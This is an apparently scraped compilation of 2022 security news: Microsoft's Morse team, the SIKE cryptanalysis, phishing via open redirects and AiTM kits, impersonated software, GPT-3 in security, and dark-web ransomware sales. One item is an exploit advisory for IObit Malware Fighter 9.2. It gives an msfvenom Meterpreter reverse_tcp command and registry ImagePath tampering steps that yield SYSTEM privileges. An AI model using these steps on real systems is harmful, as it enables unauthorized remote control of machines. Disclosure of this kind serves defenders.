What's it like to be responsible for a billion people's digital security? Just ask the company's Morse researchers.

As a rush of cybercriminals, state-backed hackers, and scammers continue to flood the zone with digital attacks and aggressive campaigns worldwide, it’s no surprise that the maker of the ubiquitous Windows operating system is focused on security defense. Microsoft’s Patch Tuesday update releases frequently contain fixes for critical vulnerabilities, including those that are actively being exploited by attackers out in the world.

The company already has the requisite groups to hunt for weaknesses in its code (the “red team") and develop mitigations (the “blue team”). But recently, that format evolved again to promote more collaboration and interdisciplinary work in the hopes of catching even more mistakes and flaws before things start to spiral. Known as Microsoft Offensive Research & Security Engineering, or Morse, the department combines the red team, blue team, and so-called green team, which focuses on finding flaws or taking weaknesses the red team has found and fixing them more systemically through changes to how things are done within an organization.

“People are convinced that you cannot move forward without investing in security,” says David Weston, Microsoft’s vice president of enterprise and operating system security who’s been at the company for 10 years. “I’ve been in security for a very long time. For most of my career, we were thought of as annoying. Now, if anything, leaders are coming to me and saying, ‘Dave, am I OK? Have we done everything we can?’ That’s been a significant change.”

Morse has been working to promote safe coding practices across Microsoft so fewer bugs end up in the company’s software in the first place. OneFuzz, an open source Azure testing framework, allows Microsoft developers to be constantly, automatically pelting their code with all sorts of unusual use cases to ferret out flaws that wouldn’t be noticeable if the software was only being used exactly as intended.

The combined team has also been at the forefront of promoting the use of safer programming languages (like Rust) across the company. And they’ve advocated embedding security analysis tools directly into the real software compiler used in the company’s production workflow. That change has been impactful, Weston says, because it means developers aren’t doing hypothetical analysis in a simulated environment where some bugs might be overlooked at a step removed from real production.

The Morse team says the shift toward proactive security has led to real progress. In a recent example, Morse members were vetting historic software—an important part of the group’s job, since so much of the Windows codebase was developed before these expanded security reviews. While examining how Microsoft had implemented Transport Layer Security 1.3, the foundational cryptographic protocol used across networks like the internet for secure communication, Morse discovered a remotely exploitable bug that could have allowed attackers to access targets’ devices.

As Mitch Adair, Microsoft’s principal security lead for Cloud Security, put it: “It would have been as bad as it gets. TLS is used to secure basically every single service product that Microsoft uses.”

The stakes are indescribably high when your job is to catch mistakes before someone else does in a product that’s used by more than a billion people around the world. Anything you let slip by could play a role in the next global cybersecurity crisis. But Weston says the Morse team self-selects for people who view that reality as a driving motivation, rather than a paralyzing specter.

“This is a game of inches; you can be amazing 99.9 percent of the time and introduce the wrong code at the wrong time and it can have dire consequences,” Weston says. “If you work on the top of a tall building all day, you don’t even notice it. But one day you might look down and go, ‘whoa, I’m pretty high up here, that’s scary.' But there are only a couple of places where you can do things at a billion scale, so the nice thing is we rarely have someone coming in who doesn’t find that exciting rather than scary.”

Perhaps most importantly, Weston says the tradeoff for living with Microsoft’s scale and the accompanying responsibility is that anything is possible at the company in a way that is only true at a small handful of the biggest tech giants.

“In some companies it’s like, well, we build a web application, we’re sort of constrained on the tools we have or the expertise in the company,” he says. “At Microsoft, we have everything from silicon to compilers to the operating system. You don’t really have good excuses for why you can’t do something.”

For the Morse team, though, this means there’s no room to squander that rarified position.

The Microsoft Team Racing to Catch Bugs Before They Happen

A late-stage candidate encryption algorithm that was meant to withstand decryption by powerful quantum computers in the future has been trivially cracked by using a computer running Intel Xeon CPU in an hour's time.
The algorithm in question is SIKE — short for Supersingular Isogeny Key Encapsulation — which made it to the fourth round of the Post-Quantum Cryptography (PQC) standardization

A late-stage candidate encryption algorithm that was meant to withstand decryption by powerful quantum computers in the future has been trivially cracked by using a computer running Intel Xeon CPU in an hour's time.

The algorithm in question is SIKE — short for Supersingular Isogeny Key Encapsulation — which made it to the fourth round of the Post-Quantum Cryptography (PQC) standardization process by the U.S. Department of Commerce's National Institute of Standards and Technology (NIST).

"Ran on a single core, the appended Magma code breaks the Microsoft SIKE challenges $IKEp182 and $IKEp217 in about 4 minutes and 6 minutes, respectively," KU Leuven researchers Wouter Castryck and Thomas Decru said in a new paper.

"A run on the SIKEp434 parameters, previously believed to meet NIST's quantum security level 1, took about 62 minutes, again on a single core."

The code was executed on an Intel Xeon CPU E5-2630v2 at 2.60GHz, which was released in 2013 using the chip maker's Ivy Bridge microarchitecture, the academics further noted.

The findings come as NIST, in early July, announced the first set of quantum-resistant encryption algorithms: CRYSTALS-Kyber for general encryption, and CRYSTALS-Dilithium, FALCON, and SPHINCS+ for digital signatures.

"SIKE is an isogeny\-based key encapsulation suite based on pseudo-random walks in supersingular isogeny graphs," the description from the algorithm authors reads.

Microsoft, which is one of the key collaborators on the algorithm, said SIKE uses "arithmetic operations on elliptic curves defined over finite fields and compute maps, so-called isogenies, between such curves."

"The security of SIDH and SIKE relies on the hardness of finding a specific isogeny between two such elliptic curves, or equivalently, of finding a path between them in the isogeny graph," the tech giant's research team explains.

Quantum-resistant cryptography is an attempt to develop encryption systems that are secure against both quantum and traditional computing systems, while also interoperating with existing communications protocols and networks.

The idea is to ensure that data encrypted today using current algorithms such as RSA, elliptic curve cryptography (ECC), AES, and ChaCha20 is not rendered vulnerable to brute-force attacks in the future with the advent of quantum computers.

"Each of these systems relies on some sort of math problem which is easy to do in one direction but hard in the reverse," David Jao, one of the co-inventors of SIKE, told The Hacker News. "Quantum computers can easily solve the hard problems underlying RSA and ECC, which would affect approximately 100% of encrypted internet traffic if quantum computers were to be built."

While SIKE was positioned as one of the NIST-designated PQC contenders, the latest research effectively invalidates the algorithm.

"The work by Castryck and Decru breaks SIKE," Jao said. "Specifically, it breaks SIDH \[Supersingular Isogeny Diffie-Hellman\], the 'hard' problem on which SIKE is based (analogous to how integer factorization is the hard problem on which RSA is based)."

"There are other isogeny-based cryptosystems other than SIKE. Some of these, such as B-SIDH, are also based on SIDH, and are also broken by the new attack. Some of them, such as CSIDH and SQIsign, are not based on SIDH, and as far as we know, are not directly affected by the new attack."

As for the next steps, Jao said while SIDH can be updated to remediate the new line of the key recovery attack, it's expected to be put off until further examination.

"It is possible that SIDH can be patched or fixed up to avoid the new attack, and we have some ideas for how to do so, but more analysis of the new attack is required before we can confidently make a statement about any possible fixes," Jao noted.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Single-Core CPU Cracked Post-Quantum Encryption Candidate Algorithm in Just an Hour

IObit Malware Fighter version 9.2 fails to provide sufficient anti-tampering protection and that shortcoming can be leveraged to escalate to SYSTEM privileges.

    [+] Credits: Yehia Elghaly (aka Mrvar0x)    [+] Website: https://mrvar0x.com/[+] Source:  "https://mrvar0x.com/2022/08/02/multiple-endpoints-security-tampering-exploit/"Vendor:=============www.iobit.comProduct:===========IObit Malware Fighter 9.2 IObit Malware Fighter is an advanced malware & spyware removal utility that detects, removes the deepest infections, and protects the PC from various of potential malware, ransomware, cryptojacking, spyware, adware, trojans, keyloggers, bots, worms, and hijackers, etc. It includes the unique "Dual-Core" engine, driver-level technology and the heuristic malware detection.Safebox can protect users from ransomware and allow users to lock their personal data with a password.Vulnerability Type:===================Missing Tamper ProtectionIncorrect AuthorizationCVE Reference:==============N/ASecurity Issue:================IObit Malware Fighter prior to version 9.2  installed on Microsoft Windows does not provide sufficient anti-tampering protection of services by users with Administrator privileges. This could result in a user disabling IObit Malware Fighter and the protection offered by it. Also It lead to Raised privilege to SYSTEM.That can occurred by modifying a specific registry key.Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AdvancedSystemCareService15Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\IMFserviceChange ImagePath path to a malicious executable.Exploit/POC:=============Create malicious executable through msfvenommsfvenom -p windows/meterpreter/reverse_tcp LHOST=$LOCALIP LPORT=4444 -f exe -o meta.exeModify (ImagePath) with the path of the malicious executable - RestartNetwork Access:===============LocalSeverity:=========High[+] DisclaimerThe author is not responsible for any misuse of the information contained herein and accepts no responsibilityfor any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related informationor exploits by the author or elsewhere. All content (c).Mrvar0x

IObit Malware Fighter 9.2 Tampering / Privilege Escalation

Phishing operators are taking advantage of security bugs in the Amex and Snapchat websites (the latter is unpatched) to steer victims to phishing pages looking to harvest Google and Microsoft logins.

Malicious actors have been taking advantage of open-redirect vulnerabilities affecting American Express and Snapchat domains to send phishing emails targeting Google Workspace and Microsoft 365 users.  

Research published by INKY reveals that in both cases the phishers included personally identifiable information (PII) in the URL. This allows the actors to rapidly customize the malicious landing pages for individual victims and disguised the PII by converting it to Base 64, turning the information into a sequence of random characters.

Phishing emails in the Snapchat group used DocuSign, FedEx, and Microsoft lures, which led to Microsoft credential harvesting sites.

INKY engineers detected more than 6,800 Snapchat phishing emails containing the open-redirect vulnerability during a period of two and a half months. Despite previously being reported to Snaptchat by Open Bug Bounty nearly a year ago, the vulnerability remains unpatched, according to the report.  

The issue was even worse with the American Express open-redirect vulnerability, which was uncovered in more than in 2,000 phishing emails during the course of just two days in July.

However, the report notes, American Express has since patched the vulnerability, and any user who clicks the link now is redirected to an error page on the company's actual website.

Redirect vulnerabilities arise when domains accept untrusted input that could cause the site to redirect users to another URL. By modifying the URL for these sites — for instance, by adding a link to another destination to the end of the original URL — an attacker can easily redirect users to websites of their choice.

"Perhaps websites don't give open-redirect vulnerabilities the attention they deserve because they don't allow attackers to harm or steal data from the site," today's report notes. "From the website operator's perspective, the only damage that potentially occurs is harm to the site's reputation. The victims, however, may lose credentials, data, and possibly money."

**Examine Links, Present Users with Disclaimers**

The report recommended that when examining links, surfers should keep an eye out for URLs including "url=", "redirect=", "external-link", or "proxy", strings that may indicate a trusted domain could redirect to another site.

Another telltale sign indicating redirection are links with multiple occurrences of "http" in the URL.

"Domain owners can prevent this abuse by avoiding the implementation of redirection in the site architecture and can also present users with an external redirection disclaimer that requires user clicks before redirecting to external sites," according to the report. "If redirection is necessary for commercial reasons, then implementing an allow-list of approved safe links prevents bad actors from inputting malicious links."  

The scam that INKY reported is the latest in a long line of phishing scams roiling the IT security landscape — earlier this week, researchers from ThreatLabz issued a warning over a large-scale phishing campaign aimed at Microsoft Outlook email services users.

American Express, Snapchat Open-Redirect Vulnerabilities Exploited in Phishing Scheme

Threat actors are increasingly mimicking legitimate applications like Skype, Adobe Reader, and VLC Player as a means to abuse trust relationships and increase the likelihood of a successful social engineering attack.
Other most impersonated legitimate apps by icon include 7-Zip, TeamViewer, CCleaner, Microsoft Edge, Steam, Zoom, and WhatsApp, an analysis from VirusTotal has revealed.
"One of the

Threat actors are increasingly mimicking legitimate applications like Skype, Adobe Reader, and VLC Player as a means to abuse trust relationships and increase the likelihood of a successful social engineering attack.

Other most impersonated legitimate apps by icon include 7-Zip, TeamViewer, CCleaner, Microsoft Edge, Steam, Zoom, and WhatsApp, an analysis from VirusTotal has revealed.

"One of the simplest social engineering tricks we've seen involves making a malware sample seem a legitimate program," VirusTotal said in a Tuesday report. "The icon of these programs is a critical feature used to convince victims that these programs are legitimate."

It's no surprise that threat actors resort to a variety of approaches to compromise endpoints by tricking unwitting users into downloading and running seemingly innocuous executables.

This, in turn, is primarily achieved by taking advantage of genuine domains in a bid to get around IP-based firewall defenses. Some of the top abused domains are discordapp\[.\]com, squarespace\[.\]com, amazonaws\[.\]com, mediafire\[.\]com, and qq\[.\]com.

In total, no fewer than 2.5 million suspicious files downloaded from 101 domains belonging to Alexa's top 1,000 websites have been detected.

The misuse of Discord has been well-documented, what with the platform's content delivery network (CDN) becoming a fertile ground for hosting malware alongside Telegram, while also offering a "perfect communications hub for attackers."

Another oft-used technique is the practice of signing malware with valid certificates stolen from other software makers. The malware scanning service said it found more than one million malicious samples since January 2021, out of which 87% had a legitimate signature when they were first uploaded to its database.

VirusTotal said it also uncovered 1,816 samples since January 2020 that masqueraded as legitimate software by packaging the malware in installers for other popular software such as Google Chrome, Malwarebytes, Zoom, Brave, Mozilla Firefox, and Proton VPN.

Such a distribution method can also result in a supply chain when attackers manage to break into a legitimate software's update server or gain unauthorized access to the source code, making it possible to sneak the malware in the form of trojanized binaries.

Alternatively, legitimate installers are being packed in compressed files along with malware-laced files, in one case including the legitimate Proton VPN installer and malware that installs the Jigsaw ransomware.

That's not all. A third method, albeit more sophisticated, entails incorporating the legitimate installer as a portable executable resource into the malicious sample so that the installer is also executed when the malware is run so as to give an illusion that the software is working as intended.

"When thinking about these techniques as a whole, one could conclude that there are both opportunistic factors for the attackers to abuse (like stolen certificates) in the short and mid term, and routinely (most likely) automated procedures where attackers aim to visually replicate applications in different ways," the researchers said.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

VirusTotal Reveals Most Impersonated Software in Malware Attacks

A new, large-scale phishing campaign has been observed using adversary-in-the-middle (AitM) techniques to get around security protections and compromise enterprise email accounts.
"It uses an adversary-in-the-middle (AitM) attack technique capable of bypassing multi-factor authentication," Zscaler researchers Sudeep Singh and Jagadeeswar Ramanukolanu said in a Tuesday report. "The campaign is

A new, large-scale phishing campaign has been observed using adversary-in-the-middle (AitM) techniques to get around security protections and compromise enterprise email accounts.

"It uses an adversary-in-the-middle (AitM) attack technique capable of bypassing multi-factor authentication," Zscaler researchers Sudeep Singh and Jagadeeswar Ramanukolanu said in a Tuesday report. "The campaign is specifically designed to reach end users in enterprises that use Microsoft's email services."

Prominent targets include fintech, lending, insurance, energy, manufacturing, and federal credit union verticals located in the U.S., U.K., New Zealand, and Australia.

This is not the first time such a phishing attack has come to light. Last month, Microsoft disclosed that over 10,000 organizations had been targeted since September 2021 by means of AitM techniques to breach accounts secured with multi-factor authentication (MFA).

The ongoing campaign, effective June 2022, commences with an invoice-themed email sent to targets containing an HTML attachment, which includes a phishing URL embedded within it.

Opening the attachment via a web browser redirects the email recipient to the phishing page that masquerades as a login page for Microsoft Office, but not before fingerprinting the compromised machine to determine whether the victim is actually the intended target.

AitM phishing attacks go beyond the traditional phishing approaches designed to plunder credentials from unwitting users, particularly in scenarios where MFA is enabled – a security barrier that prevents the attacker from logging into the account with only the stolen credentials.

To circumvent this, the rogue landing page developed using a phishing kit functions as a proxy that captures and relays all the communication between the client (i.e., victim) and the email server.

"The kits intercept the HTML content received from the Microsoft servers, and before relaying it back to the victim, the content is manipulated by the kit in various ways as needed, to make sure the phishing process works," the researchers said.

This also entails replacing all the links to the Microsoft domains with equivalent links to the phishing domain so as to ensure that the back-and-forth remains intact with the fraudulent website throughout the session.

Zscaler said it observed the attacker manually logging into the account eight minutes after the credential theft, following it up by reading emails and checking the user's profile information.

What's more, in some instances, the hacked email inboxes are subsequently used to send additional phishing emails as part of the same campaign to conduct business email compromise (BEC) scams.

"Even though security features such as multi-factor authentication (MFA) add an extra layer of security, they should not be considered as a silver bullet to protect against phishing attacks," the researchers noted.

"With the use of advanced phishing kits (AiTM) and clever evasion techniques, threat actors can bypass both traditional as well as advanced security solutions."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Warns of Large-Scale AiTM Attacks Targeting Enterprise Users

In Quest KACE Systems Management Appliance (SMA) through 12.0, a hash collision is possible during authentication. This may allow authentication with invalid credentials.

For the best web experience, please use IE11+, Chrome, Firefox, or Safari

*   Resources
*   Blogs
    
    *   IT Industry Insights
    *   Quest Solution Blogs
        *   Data Protection
        *   Data Management
        *   Microsoft Platform Management
        *   Performance Monitoring
        *   Unified Endpoint Management
        *   IT Ninja
        *   Toad World Blog
    
*   Forums
*   
*   *   United States (English)
    *   Brazil (Português)
    *   China (中文)
    *   France (Français)
    *   Germany (Deutsch)
    *   Japan (日本語)
    *   Mexico (Español)
    
*   
*   *   Account Settings
    

Products

**Products****By Product Category**

Solutions

**Solutions**

*   **Automate backup & disaster recovery**
    
    Restore business operations, data integrity and customer trust in minutes or hours instead of weeks or months
    
*   **Become data driven**
    
    Empower enterprise stakeholders to use data assets strategically for data operations, data protection and data governance
    
*   **Gain comprehensive data protection**
    
    Protect and recover all your systems, applications and data while reducing backup storage costs
    
*   **Improve your cybersecurity posture**
    
    Achieve identity-centric cybersecurity to protect the people, applications and data that are essential to business
    
*   **Migrate & consolidate Microsoft workloads**
    
    Conquer your next migration (now and in the future) by making it a non-event for end users
    
*   **Protect and secure your endpoints**
    
    Discover, manage and secure evolving hybrid workforce environments
    
*   **Strengthen hybrid AD & Microsoft 365 security**
    
    Detect, defend against and recover from cyber attacks and insider threats
    

About

*   Why Quest
*   Leadership
*   Customer Stories
*   News
*   Careers
*   Contact Us

Home / KACE Unified Endpoint Management

KACE® by Quest supports your unified endpoint management (UEM) strategy by helping you discover and track every device in your environment, automate administrative tasks, keep compliance requirements up-to-date and secure your network from a range of cyberthreats. With KACE, you can effectively address your endpoint management needs with individual products for specific tasks or as an integrated UEM solution.

**Key benefits**

**Discover**

Centralize systems management while gaining visibility and control through a single view of your assets

**Manage**

Efficiently manage your endpoint landscape and lifecycle while reducing complexity and automating tasks

**Secure**

Protect your endpoints while minimizing the risks of non-compliance with data protection and licensing requirements

**KACE Product Portfolio**

 02:41

**KACE Unified Endpoint Manager**

KACE Unified Endpoint Manager unites traditional endpoint management with modern management in a shared intuitive interface. Discover, manage and secure all your endpoints from one console as you co-manage your traditional and modern endpoints, including Windows and Mac laptops, and iOS and Android mobile devices. 

**Key Features**

*   Scan to discover devices and remotely provision them
*   Access a detailed inventory of data on each traditional device
*   Define policies and administrative functions for a single device or group of devices
*   Autonomously track, deploy and maintain current versions of software and applications
*   Automate patch identification and deployment

 01:58

 01:54

 01:37

**KACE Cloud Mobile Device Manager**

Inventory, manage and secure the mobile devices in your environment with KACE Cloud Mobile Device Manager. Get a simple, straightforward, cloud-based solution for mobile device management. Enjoy single-pane-of-glass management for both mobile and traditional devices when combined with the KACE Systems Management Appliance.

**Key Features**

*   Powerful device control
*   BYOD and company-owned device support
*   Android and iOS Support

 02:01

**KACE Desktop Authority**

Use KACE Desktop Authority to eliminate the hassle of deploying and securing network-connected devices by customizing them at first login. Easily configure firewall and browser security settings for physical, virtual and published Windows environments. Ensure that applications are maintained and access to network resources is always available.

**Key Features**

*   Flexible criteria-based settings and configurations
*   Windows environment management
*   Remote user support
*   Device security

 02:00

**KACE Privilege Manager**

Maintain a least-privileged, GDPR-compliant environment with KACE Privilege Manager. Quickly elevate and manage your organization’s end users and administrative rights. Give users an easier and more affordable way to maintain security using self-service capabilities in a locked-down PC environment.

**Key Features**

*   Elevation on-demand
*   Criteria-based assignment of access rights
*   Digital certification verification
*   Application blacklisting

 01:26

**RemoteScan**

Simplify your document scanning workflow and make sure that images are securely stored on the server and not at the endpoint with RemoteScan. Support remote desktop scanning for terminal server and cloud environments while easily meeting compliance requirements by using secure virtual channels to transmit scanned images at fast scanning speeds, even over complex networks.

**Key Features**

*   Supports TWAIN scanning software applications
*   Connects scanners in remote desktop environments
*   Complies with enterprise requirements
*   Supports TWAIN, WIA and ScanSnap drivers

**Resources**

**Awards**

**St. Dominic Hospital**

The KACE Systems Management Appliance has made life a whole lot easier. We can see asset information and software details, down to the version. I mean, it's been the ultimate timesaver.

Rudy Bracey Systems Administrator, St. Dominic Hospital Read Case Study

**Coastal Community Credit Union**

KACE is a one-stop shop for our biggest IT needs. Sabrina Geoffroy, Technical Business Analyst, Coastal Community Credit Union

Sabrina Geoffroy Technical Business Analyst, Coastal Community Credit Union Read Case Study

**Maniilaq Association**

I know I implemented RemoteScan in a brand-new way, but the software was flexible enough to allow it. That was the big bonus

Wayne Hogue VMware Administrator, Maniilaq Association Read Case Study

CVE-2022-30285: Endpoint Management | KACE by Quest

Complex neural networks, including GPT-3, can deliver useful cybersecurity capabilities, such as explaining malware and quickly classifying websites, researchers find.

GPT-3, the large neural network created with extensive training using massive datasets, provides a variety of benefits to cybersecurity applications, including natural-language-based threat hunting, easier categorization of unwanted content, and clearer explanations of complex or obfuscated malware, according to research to be presented at the Black Hat USA conference next week.

Using the third version of the Generative Pre-trained Transformer — more commonly known as GPT-3 — two researchers with cybersecurity firm Sophos found that the technology could turn natural-language queries, such as "show me all word processing software that is making outgoing connections to servers in South Asia," into requests to a security information and event management (SIEM) system. GPT-3 is also very good at taking a small number of examples of website classifications and then using those to categorize other sites, finding commonalities between criminal sites or between exploit forums.

Both applications of GPT-3 can save companies and cybersecurity analysts significant time, says Joshua Saxe, one of the two authors of the Black Hat research and chief scientist for artificial intelligence at Sophos.

"We are not using GPT-3 in production at this point, but I do see GPT-3 and large deep-learning models — the ones you cannot build on commodity hardware — I see those models as important for strategic cyber defense," he says. "We are getting much better — dramatically better — results using a GPT-3-based approach than we would get with traditional approaches using smaller models."

The research is the latest application of GPT-3 to show the model's surprising effectiveness at translating natural-language queries into machine commands, program code, and images. The creator of GPT-3, OpenAI, has teamed up with GitHub, for example, to create an automated pair programming system, Copilot, that can generate code from natural-language comments and simple function names.

GPT-3 is a generative neural network that uses deep-learning algorithms' ability to recognize patterns to feed back results into a second neural network that creates content. A machine learning (ML) system for recognizing images, for example, can rank results from a second neural network used to turn text into original art. By making the feedback loop automatic, the ML model can quickly create new artificial intelligence (AI) systems, like the art-producing DALL-E.

The technology is so effective that an AI researcher at Google says one implementation of a large-language chatbot model has become sentient.

While the nuanced learning of the GPT-3 model surprised the Sophos researchers, they are far more focused on the utility of the technology to ease the job of cybersecurity analysts and malware researchers. In their upcoming presentation at Black Hat, Saxe and fellow Sophos researcher Younghoo Lee will show how the largest neural networks can deliver useful and surprising results.

In addition to creating queries for threat hunting and classifying websites, the Sophos researchers used generative training to improve the GPT-3 model's performance for specific cybersecurity tasks. For example, the researchers took an obfuscated and complicated PowerShell script, translated it with GPT-3 using different parameters, and then compared its functionality to the original script. The configuration that translates the original script closest to the original is deemed the best solution and is then used for further training.

"GPT-3 can do about as well as the traditional models but with a tiny handful of training examples," Saxe says.

Companies have invested in AI and ML as essential tools to improve the efficiency of technology, with "AI/ML" becoming a must-have term in product marketing.

Yet ways to exploit AI/ML models have jumped from whiteboard theory to practical attacks. Government contractor MITRE and a group of technology firms have created an encyclopedia of adversarial attacks on AI systems. Known as the Adversarial Threat Landscape for Artificial-Intelligence Systems, or ATLAS, the classification of techniques includes abusing the real-time learning to poison training data, like what happened with Microsoft's Tay chatbot, to evading the ML model's capabilities, such as what researchers did with Cylance's malware detection engine.

In the end, AI likely has more to offer defenders than attackers, Saxe says. Still, while the technology is worth using, it will not dramatically shift the balance between attackers and defenders, he says.

"The overall goal of the talk is to convince that these large language models are not just hype, they are real, and we need to find where they fit in our cybersecurity toolbox," Saxe says.

Large Language AI Models Have Real Security Benefits

The campaign uses adversary-in-the-middle techniques to bypass multifactor authentication, evade detection.

Researchers are warning about a new, large-scale phishing campaign aimed at Microsoft Outlook email services users.

The team at ThreatLabz discovered the new phishing kit and said it uses an adversary-in-the-middle (AiTM) model, which can be effective for evading detection by email and network security protections, as well as bypassing multifactor authentication protections.

ThreatLabz researchers said they detected several newly registered domains being used in the active phishing campaign.

"The campaign is specifically designed to reach end users in enterprises that use Microsoft's email services," the ThreatLabz report on the new phishing campaign said. "Business email compromise (BEC) continues to be an ever-present threat to organizations, and this campaign further highlights the need to protect against such attacks."

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Massive New Phishing Campaign Targets Microsoft Email Service Users

Venafi investigation of 35 million Dark Web URLs shows macro-enabled ransomware widely available at bargain prices.

**SALT LAKE CITY, Aug. 2, 2022—** Venafi, the inventor and leading provider of machine identity management, today announced the findings of a Dark Web investigation into ransomware spread via malicious macros. Conducted in partnership with criminal intelligence provider Forensic Pathways between November 2021 and March 2022, the research analyzed 35 million Dark Web URLs, including marketplaces and forums, using the Forensic Pathways Dark Search Engine. The findings uncovered 475 web pages of sophisticated ransomware products and services, with several high-profile groups aggressively marketing ransomware-as-a-service.

*   87% of the ransomware found on the dark web has been delivered via malicious macros to infect targeted systems.

*   30 different "brands" of ransomware were identified within marketplace listings and forum discussions.

*   Many strains of ransomware being sold — such as Babuk, GoldenEye, Darkside/BlackCat, Egregor, HiddenTear and WannaCry — have been successfully used in high-profile attacks.

*   Ransomware strains used in high-profile attacks command a higher price for associated services. For example, the most expensive listing was $1,262 for a customized version of Darkside ransomware, which was used in the infamous Colonial Pipeline ransomware attack of 2021.

*   Source code listings for well-known ransomware generally command higher price points; Babuk source code is listed for $950 and Paradise source code is selling for $593.

"Ransomware continues to be one of biggest cybersecurity risks in every organization," said Kevin Bocek, vice president of security strategy and threat intelligence for Venafi. "The ransomware attack on Colonial Pipeline was so severe that it was deemed a national security threat, forcing President Biden to declare a state of emergency."

Macros are used to automate common tasks in Microsoft Office, helping people to be more productive. However, attackers can use this same functionality to deliver many kinds of malware, including ransomware. In February, Microsoft announced a major change to combat the rapid growth of ransomware attacks delivered via malicious macros, but it temporarily reversed that decision in response to community feedback.

"Given that almost anyone can launch a ransomware attack using a malicious macro, Microsoft's indecision around disabling of macros should scare everyone," said Bocek. "While the company has switched course a second time on disabling macros, the fact that there was backlash from the user community suggests that macros could persist as a ripe attack vector."

In addition to a variety of ransomware at various price points, the research also uncovered a wide range of services and tools that help make it easier for attackers with minimal technical skills to launch ransomware attacks. Services with the greatest number of listings include those offering source code, build services, custom development services, and ransomware packages that include step-by-step tutorials.

Generic ransomware build services also command high prices, with some listings costing more than $900. At the other end of the price spectrum, many low-cost ransomware options are available across multiple listings — with prices starting at just 99 cents for Lockscreen ransomware.

These findings are another example of the need for a machine identity management control plane to drive specific business outcomes, including observability, consistency, and reliability. In particular, code-signing is a key machine-identity management security control that eliminates the threat of macro-enabled ransomware.

"Using code-signing certificates to authenticate macros means that any unsigned macros cannot execute, stopping ransomware attacks in its tracks," Bocek concludes. "This is an opportunity for security teams to step up and protect their businesses, especially in banking, insurance, health care, and energy, where macros and Office documents are used every day to power decision making."

**About the research**

This research was carried out between November 2021-March 2022 by Venafi in partnership with Forensic Pathways, which has developed Dark Search Engine (DSE), an automated crawler/scraper of the Tor.Onion Dark Web. The intelligence tool contains more than 35 million URLs in the index.

Publicly available information, such as PC Risk, was used to determine if malicious macros were used in the initial attack vector.

For more information read the blog.

**About Venafi**

Venafi is the cybersecurity market leader in machine identity management. From the ground to the cloud, Venafi solutions manage and protect identities for all types of machines — from physical and IoT devices to software applications, APIs, and containers. Venafi provides global visibility, life cycle automation, and actionable intelligence for all machine identity types and the security and reliability risks associated with them.

Jetstack, a Venafi company, is a cloud native products and strategic consulting company working with enterprises using Kubernetes and OpenShift. An open source pioneer, Jetstack has achieved notable industry recognition as the creator of cert-manager, the open source industry standard for cloud native machine identity management.

Jetstack’s open source products and solutions protect the application environments and platform infrastructure of global banks, multinational retailing companies, and defense organizations by providing enterprise platform and security teams the power to build, scale, and secure their cloud infrastructure.

With more than 30 patents, Venafi delivers innovative machine identity-management solutions for the world's most demanding, security-conscious organizations and government agencies, including the top five U.S. health insurers; the top five U.S. airlines; the top four credit card issuers; three out of the four top accounting and consulting firms; four of the five top U.S. retailers; and the top four banks in each of the following countries: the US, the UK, Australia, and South Africa.

www.venafi.com

www.jetstack.io

**About Forensic Pathways**

Incorporated in 2001, Forensic Pathways provides innovative technologies within the criminal-intelligence arena.

Focused primarily on the provision of digital forensic technologies, Forensic Pathways offers its international clients unique technologies in the management of mobile phone data, image analysis, and ballistics analysis.

Tag

#microsoft